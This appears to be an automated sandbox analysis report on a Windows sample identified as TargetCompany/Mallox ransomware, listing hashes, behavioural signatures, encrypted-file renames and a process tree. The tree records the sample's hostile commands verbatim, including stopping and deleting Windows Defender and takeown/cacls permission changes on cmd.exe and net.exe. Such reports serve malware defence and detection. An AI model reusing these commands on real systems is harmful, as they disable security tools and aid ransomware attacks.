Resubmissions
03-02-2022 13:26
220203-qpq5cahggm 301-02-2022 11:13
220201-nbqkjsdear 1001-02-2022 11:12
220201-na5m3sdeak 1031-12-2021 08:31
211231-keqg6sggb4 10Analysis
-
max time kernel
148s -
max time network
133s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
31-12-2021 08:31
Static task
static1
Behavioral task
behavioral1
Sample
ConsoleApp7.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
ConsoleApp7.exe
Resource
win10-en-20211208
General
-
Target
ConsoleApp7.exe
-
Size
53KB
-
MD5
b2993b2a7a1edba14742564de7e85cb2
-
SHA1
cf7f1085978128cc082aec921d34d6d25e4ab19b
-
SHA256
800b4455105a08833332092017909f9dd47bd4ebfb1cbddbe0b95658d03b8d64
-
SHA512
a64951f5026a2f3bb01652bae0267b1d4b88b017a64208bb2e556a755a44e86eab0df33d43e759defe4caefc30693099b74fa1ebac90ff323ac2e555f51d892a
Malware Config
Extracted
C:\Users\Admin\RECOVERY INFORMATION.txt
Signatures
-
TargetCompany
Ransomware which encrypts files using a combination of ChaCha20, AES-128, and Curve25519, first seen in June 2021.
-
TargetCompany Payload 7 IoCs
resource yara_rule behavioral1/memory/1368-90-0x0000000000400000-0x0000000000428000-memory.dmp family_targetcompany behavioral1/memory/1368-92-0x0000000000400000-0x0000000000428000-memory.dmp family_targetcompany behavioral1/memory/1368-91-0x0000000000400000-0x0000000000428000-memory.dmp family_targetcompany behavioral1/memory/1368-94-0x000000000040AF56-mapping.dmp family_targetcompany behavioral1/memory/1368-93-0x0000000000400000-0x0000000000428000-memory.dmp family_targetcompany behavioral1/memory/1368-107-0x0000000000400000-0x0000000000428000-memory.dmp family_targetcompany behavioral1/memory/1368-117-0x0000000000400000-0x0000000000428000-memory.dmp family_targetcompany -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1060 bcdedit.exe 924 bcdedit.exe -
Nirsoft 13 IoCs
resource yara_rule behavioral1/files/0x000700000001326b-60.dat Nirsoft behavioral1/files/0x000700000001326b-61.dat Nirsoft behavioral1/files/0x000700000001326b-63.dat Nirsoft behavioral1/files/0x000700000001326b-65.dat Nirsoft behavioral1/files/0x000700000001326b-66.dat Nirsoft behavioral1/files/0x000700000001326b-67.dat Nirsoft behavioral1/files/0x000700000001326b-69.dat Nirsoft behavioral1/files/0x000700000001326b-71.dat Nirsoft behavioral1/files/0x000700000001326b-72.dat Nirsoft behavioral1/files/0x000700000001326b-74.dat Nirsoft behavioral1/files/0x000700000001326b-76.dat Nirsoft behavioral1/files/0x000700000001326b-77.dat Nirsoft behavioral1/files/0x000700000001326b-79.dat Nirsoft -
Executes dropped EXE 5 IoCs
pid Process 112 AdvancedRun.exe 1096 AdvancedRun.exe 1120 AdvancedRun.exe 364 AdvancedRun.exe 1368 RegAsm.exe -
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\UnprotectGrant.png => C:\Users\Admin\Pictures\UnprotectGrant.png.mallox RegAsm.exe File renamed C:\Users\Admin\Pictures\SwitchRequest.tif => C:\Users\Admin\Pictures\SwitchRequest.tif.mallox RegAsm.exe File renamed C:\Users\Admin\Pictures\RenameOut.tif => C:\Users\Admin\Pictures\RenameOut.tif.mallox RegAsm.exe File renamed C:\Users\Admin\Pictures\SearchMove.raw => C:\Users\Admin\Pictures\SearchMove.raw.mallox RegAsm.exe File renamed C:\Users\Admin\Pictures\UnregisterCompress.crw => C:\Users\Admin\Pictures\UnregisterCompress.crw.mallox RegAsm.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 10 IoCs
pid Process 952 ConsoleApp7.exe 952 ConsoleApp7.exe 112 AdvancedRun.exe 112 AdvancedRun.exe 952 ConsoleApp7.exe 952 ConsoleApp7.exe 1120 AdvancedRun.exe 1120 AdvancedRun.exe 952 ConsoleApp7.exe 1368 RegAsm.exe -
Modifies file permissions 1 TTPs 18 IoCs
pid Process 1948 takeown.exe 1636 takeown.exe 1408 takeown.exe 1728 takeown.exe 1392 takeown.exe 212 takeown.exe 1728 takeown.exe 2028 takeown.exe 1272 takeown.exe 1276 takeown.exe 560 takeown.exe 912 takeown.exe 1564 takeown.exe 1836 takeown.exe 1096 takeown.exe 1736 takeown.exe 524 takeown.exe 752 takeown.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: RegAsm.exe File opened (read-only) \??\N: RegAsm.exe File opened (read-only) \??\W: RegAsm.exe File opened (read-only) \??\Y: RegAsm.exe File opened (read-only) \??\Z: RegAsm.exe File opened (read-only) \??\E: RegAsm.exe File opened (read-only) \??\H: RegAsm.exe File opened (read-only) \??\K: RegAsm.exe File opened (read-only) \??\X: RegAsm.exe File opened (read-only) \??\P: RegAsm.exe File opened (read-only) \??\Q: RegAsm.exe File opened (read-only) \??\R: RegAsm.exe File opened (read-only) \??\T: RegAsm.exe File opened (read-only) \??\B: RegAsm.exe File opened (read-only) \??\I: RegAsm.exe File opened (read-only) \??\L: RegAsm.exe File opened (read-only) \??\O: RegAsm.exe File opened (read-only) \??\U: RegAsm.exe File opened (read-only) \??\S: RegAsm.exe File opened (read-only) \??\V: RegAsm.exe File opened (read-only) \??\A: RegAsm.exe File opened (read-only) \??\F: RegAsm.exe File opened (read-only) \??\J: RegAsm.exe File opened (read-only) \??\M: RegAsm.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 952 set thread context of 1368 952 ConsoleApp7.exe 32 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01126_.WMF RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiItalic.ttf RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-progress.jar RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR24F.GIF RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF RegAsm.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\RECOVERY INFORMATION.txt RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImage.jpg RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Urban.thmx RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer RegAsm.exe File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\RECOVERY INFORMATION.txt RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02398_.WMF RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar RegAsm.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Casablanca RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions_Response.css RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301252.WMF RegAsm.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\RECOVERY INFORMATION.txt RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\EXLIRM.XML RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG RegAsm.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\RECOVERY INFORMATION.txt RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_ja_4.4.0.v20140623020002.jar RegAsm.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg RegAsm.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Madrid RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL_COL.HXT RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00254_.WMF RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_mid_over.gif RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBPAGE.XML RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPrintTemplate.html RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC RegAsm.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EET RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Pitchbook.potx RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WPULQT98.POC RegAsm.exe File created C:\Program Files\Java\RECOVERY INFORMATION.txt RegAsm.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Shanghai RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_F_COL.HXK RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\mset7jp.kic RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01472_.WMF RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01631_.WMF RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG RegAsm.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\background.gif RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Concourse.thmx RegAsm.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF RegAsm.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 2 IoCs
pid Process 228 net.exe 3016 net.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 968 vssadmin.exe 1388 vssadmin.exe -
Kills process with taskkill 64 IoCs
pid Process 2108 Process not Found 2580 Process not Found 1688 Process not Found 524 Process not Found 2284 Process not Found 2484 Process not Found 2860 Process not Found 2600 Process not Found 2688 Process not Found 2924 Process not Found 2880 Process not Found 2496 Process not Found 2272 Process not Found 2124 taskkill.exe 2568 taskkill.exe 3060 taskkill.exe 2292 Process not Found 1580 Process not Found 2188 Process not Found 2640 Process not Found 1836 Process not Found 684 taskkill.exe 2388 taskkill.exe 2864 taskkill.exe 2288 Process not Found 1580 Process not Found 2196 Process not Found 2804 Process not Found 836 taskkill.exe 2128 Process not Found 2056 Process not Found 2056 Process not Found 1936 Process not Found 1732 taskkill.exe 2404 Process not Found 2272 Process not Found 1000 Process not Found 868 Process not Found 216 Process not Found 2800 taskkill.exe 2264 taskkill.exe 2368 Process not Found 2220 Process not Found 2648 Process not Found 2072 taskkill.exe 1824 taskkill.exe 2904 Process not Found 2328 Process not Found 2996 Process not Found 1120 taskkill.exe 1664 Process not Found 2480 Process not Found 2836 Process not Found 1532 Process not Found 2880 Process not Found 1628 Process not Found 2052 Process not Found 2596 Process not Found 560 Process not Found 2832 Process not Found 1492 Process not Found 2444 taskkill.exe 1328 taskkill.exe 1172 Process not Found -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 112 AdvancedRun.exe 112 AdvancedRun.exe 1096 AdvancedRun.exe 1096 AdvancedRun.exe 1120 AdvancedRun.exe 1120 AdvancedRun.exe 364 AdvancedRun.exe 364 AdvancedRun.exe 952 ConsoleApp7.exe 952 ConsoleApp7.exe 1368 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 952 ConsoleApp7.exe Token: SeDebugPrivilege 112 AdvancedRun.exe Token: SeImpersonatePrivilege 112 AdvancedRun.exe Token: SeDebugPrivilege 1096 AdvancedRun.exe Token: SeImpersonatePrivilege 1096 AdvancedRun.exe Token: SeDebugPrivilege 1120 AdvancedRun.exe Token: SeImpersonatePrivilege 1120 AdvancedRun.exe Token: SeDebugPrivilege 364 AdvancedRun.exe Token: SeImpersonatePrivilege 364 AdvancedRun.exe Token: SeTakeOwnershipPrivilege 1948 takeown.exe Token: SeTakeOwnershipPrivilege 1368 RegAsm.exe Token: SeDebugPrivilege 1368 RegAsm.exe Token: SeBackupPrivilege 1760 vssvc.exe Token: SeRestorePrivilege 1760 vssvc.exe Token: SeAuditPrivilege 1760 vssvc.exe Token: SeTakeOwnershipPrivilege 752 DllHost.exe Token: SeTakeOwnershipPrivilege 2028 cacls.exe Token: SeTakeOwnershipPrivilege 1096 takeown.exe Token: SeTakeOwnershipPrivilege 560 cmd.exe Token: SeTakeOwnershipPrivilege 524 cmd.exe Token: SeTakeOwnershipPrivilege 1408 conhost.exe Token: SeTakeOwnershipPrivilege 1392 conhost.exe Token: SeDebugPrivilege 1780 taskkill.exe Token: SeDebugPrivilege 1056 taskkill.exe Token: SeDebugPrivilege 1884 taskkill.exe Token: SeDebugPrivilege 1264 sc.exe Token: SeDebugPrivilege 208 sc.exe Token: SeDebugPrivilege 2932 taskkill.exe Token: SeDebugPrivilege 2924 taskkill.exe Token: SeDebugPrivilege 2940 net.exe Token: SeDebugPrivilege 2980 taskkill.exe Token: SeDebugPrivilege 2988 taskkill.exe Token: SeDebugPrivilege 684 sc.exe Token: SeDebugPrivilege 228 taskkill.exe Token: SeDebugPrivilege 1948 net.exe Token: SeDebugPrivilege 2240 taskkill.exe Token: SeDebugPrivilege 2276 taskkill.exe Token: SeDebugPrivilege 2256 taskkill.exe Token: SeDebugPrivilege 2196 sc.exe Token: SeDebugPrivilege 2552 taskkill.exe Token: SeDebugPrivilege 2420 taskkill.exe Token: SeDebugPrivilege 2560 taskkill.exe Token: SeDebugPrivilege 2484 taskkill.exe Token: SeDebugPrivilege 2368 taskkill.exe Token: SeDebugPrivilege 2852 sc.exe Token: SeDebugPrivilege 1884 taskkill.exe Token: SeDebugPrivilege 1056 taskkill.exe Token: SeDebugPrivilege 2800 taskkill.exe Token: SeDebugPrivilege 2576 taskkill.exe Token: SeDebugPrivilege 2124 sc.exe Token: SeDebugPrivilege 2984 sc.exe Token: SeDebugPrivilege 1732 taskkill.exe Token: SeDebugPrivilege 2160 net.exe Token: SeDebugPrivilege 2112 taskkill.exe Token: SeDebugPrivilege 2072 net.exe Token: SeDebugPrivilege 2444 taskkill.exe Token: SeDebugPrivilege 2092 taskkill.exe Token: SeDebugPrivilege 3020 sc.exe Token: SeDebugPrivilege 1392 taskkill.exe Token: SeDebugPrivilege 2780 net1.exe Token: SeDebugPrivilege 2132 taskkill.exe Token: SeDebugPrivilege 1120 taskkill.exe Token: SeDebugPrivilege 1052 taskkill.exe Token: SeDebugPrivilege 2948 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 952 wrote to memory of 112 952 ConsoleApp7.exe 27 PID 952 wrote to memory of 112 952 ConsoleApp7.exe 27 PID 952 wrote to memory of 112 952 ConsoleApp7.exe 27 PID 952 wrote to memory of 112 952 ConsoleApp7.exe 27 PID 112 wrote to memory of 1096 112 AdvancedRun.exe 28 PID 112 wrote to memory of 1096 112 AdvancedRun.exe 28 PID 112 wrote to memory of 1096 112 AdvancedRun.exe 28 PID 112 wrote to memory of 1096 112 AdvancedRun.exe 28 PID 952 wrote to memory of 1120 952 ConsoleApp7.exe 29 PID 952 wrote to memory of 1120 952 ConsoleApp7.exe 29 PID 952 wrote to memory of 1120 952 ConsoleApp7.exe 29 PID 952 wrote to memory of 1120 952 ConsoleApp7.exe 29 PID 1120 wrote to memory of 364 1120 AdvancedRun.exe 30 PID 1120 wrote to memory of 364 1120 AdvancedRun.exe 30 PID 1120 wrote to memory of 364 1120 AdvancedRun.exe 30 PID 1120 wrote to memory of 364 1120 AdvancedRun.exe 30 PID 952 wrote to memory of 2032 952 ConsoleApp7.exe 31 PID 952 wrote to memory of 2032 952 ConsoleApp7.exe 31 PID 952 wrote to memory of 2032 952 ConsoleApp7.exe 31 PID 952 wrote to memory of 2032 952 ConsoleApp7.exe 31 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 2032 wrote to memory of 844 2032 WScript.exe 33 PID 2032 wrote to memory of 844 2032 WScript.exe 33 PID 2032 wrote to memory of 844 2032 WScript.exe 33 PID 2032 wrote to memory of 844 2032 WScript.exe 33 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 952 wrote to memory of 1368 952 ConsoleApp7.exe 32 PID 844 wrote to memory of 1016 844 cmd.exe 35 PID 844 wrote to memory of 1016 844 cmd.exe 35 PID 844 wrote to memory of 1016 844 cmd.exe 35 PID 844 wrote to memory of 1016 844 cmd.exe 35 PID 844 wrote to memory of 1948 844 cmd.exe 36 PID 844 wrote to memory of 1948 844 cmd.exe 36 PID 844 wrote to memory of 1948 844 cmd.exe 36 PID 844 wrote to memory of 1948 844 cmd.exe 36 PID 844 wrote to memory of 1972 844 cmd.exe 37 PID 844 wrote to memory of 1972 844 cmd.exe 37 PID 844 wrote to memory of 1972 844 cmd.exe 37 PID 844 wrote to memory of 1972 844 cmd.exe 37 PID 844 wrote to memory of 2044 844 cmd.exe 38 PID 844 wrote to memory of 2044 844 cmd.exe 38 PID 844 wrote to memory of 2044 844 cmd.exe 38 PID 844 wrote to memory of 2044 844 cmd.exe 38 PID 844 wrote to memory of 544 844 cmd.exe 39 PID 844 wrote to memory of 544 844 cmd.exe 39 PID 844 wrote to memory of 544 844 cmd.exe 39 PID 844 wrote to memory of 544 844 cmd.exe 39 PID 844 wrote to memory of 1980 844 cmd.exe 40 PID 844 wrote to memory of 1980 844 cmd.exe 40 PID 844 wrote to memory of 1980 844 cmd.exe 40 PID 844 wrote to memory of 1980 844 cmd.exe 40 PID 844 wrote to memory of 1820 844 cmd.exe 41 PID 844 wrote to memory of 1820 844 cmd.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\ConsoleApp7.exe"C:\Users\Admin\AppData\Local\Temp\ConsoleApp7.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 1123⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 11203⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:364
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Unctnmnxidkfrmahbwqxhbt.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Desarzwkill$.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f4⤵PID:1016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cmd.exe /a4⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1972
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /g Administrators:f4⤵PID:2044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:544
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Users:r4⤵PID:1980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1820
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Administrators:r4⤵PID:912
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d SERVICE4⤵PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1604
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssqlserver4⤵PID:1288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:616
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d "network service"4⤵PID:832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:432
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g system:r4⤵PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1780
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress4⤵PID:268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cmd.exe /a4⤵
- Modifies file permissions
PID:1836
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f4⤵PID:1736
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r4⤵PID:1172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:292
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r4⤵PID:1636
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE4⤵PID:1332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2040
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver4⤵PID:684
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"4⤵PID:1688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1620
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g system:r4⤵PID:560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:912
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress4⤵PID:704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net.exe /a4⤵
- Modifies file permissions
PID:752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1392
-
-
